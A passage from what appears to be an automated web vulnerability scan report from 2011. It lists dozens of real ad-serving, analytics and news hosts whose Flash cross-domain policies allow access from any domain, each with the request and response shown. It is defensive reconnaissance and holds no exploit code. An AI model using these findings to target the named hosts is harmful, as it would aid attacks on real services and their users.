ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 1842867593 1842831716
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=475
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.23. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 09 May 2011 15:39:06 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.24. http://event.adxpose.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1304614332000"
Last-Modified: Thu, 05 May 2011 16:52:12 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 09 May 2011 15:35:21 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

3.25. http://finance.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:36:57 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.26. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 01:12:03 GMT
Expires: Thu, 05 May 2011 01:09:19 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 51816
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.27. http://fw.adsafeprotected.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fw.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1304446860000"
Last-Modified: Tue, 03 May 2011 18:21:00 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 09 May 2011 15:39:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.28. http://gannett.gcion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

3.29. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2ae5"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web205
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.30. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.31. http://ic.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ic.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ic.nexac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:39 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.32. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Mar 2011 22:34:09 GMT
Accept-Ranges: bytes
ETag: "f2db35f1e0ddcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:37:52 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.33. http://k.collective-media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: k.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:37:00 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

3.34. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:10 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.35. http://map.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 09 May 2011 15:35:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.36. http://metrics.csmonitor.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.csmonitor.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:21 GMT
Server: Omniture DC/2.0.0
xserver: www315
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.37. http://metrics.npr.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
xserver: www55
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.38. http://mobile.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mobile.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Accept-Ranges: bytes
ETag: "0b66c58755c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:45 GMT
Connection: close
Content-Length: 121

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.39. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 09 May 2011 15:36:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.40. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:35:02 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 09 May 2011 15:35:02 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.41. http://radar.weather.gov/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: radar.weather.gov

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 09 Jul 2010 21:50:42 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 167
Content-Type: text/xml
Cache-Control: max-age=11175
Expires: Mon, 09 May 2011 18:42:55 GMT
Date: Mon, 09 May 2011 15:36:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="SOAPAction"/>
</cross-domain-policy>

3.42. http://s.meebocdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Content-Type: text/xml
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:35:00 GMT
Server: lighttpd/1.4.19
Cache-Control: private, max-age=604800
Age: 59442
Expires: Sun, 15 May 2011 23:04:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...

3.43. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 02:46:13 GMT
Expires: Tue, 10 May 2011 02:46:13 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 46132

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.44. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:19 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

3.45. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:35:40 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.46. http://spd.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:15b0"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.47. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:35:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.48. http://stp.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stp.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stp.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Accept-Ranges: bytes
ETag: "0b66c58755c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Content-Length: 121

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.49. http://t.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "5d240b9-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

3.50. http://t.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:55e"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.51. http://trc.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 May 2011 19:38:04 GMT
ETag: "f406f8-199-4a250297d3f00"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

3.52. http://usatoday1.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:51 GMT
Server: Omniture DC/2.0.0
xserver: www419
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.53. http://va.px.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.54. http://w10.localadbuy.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

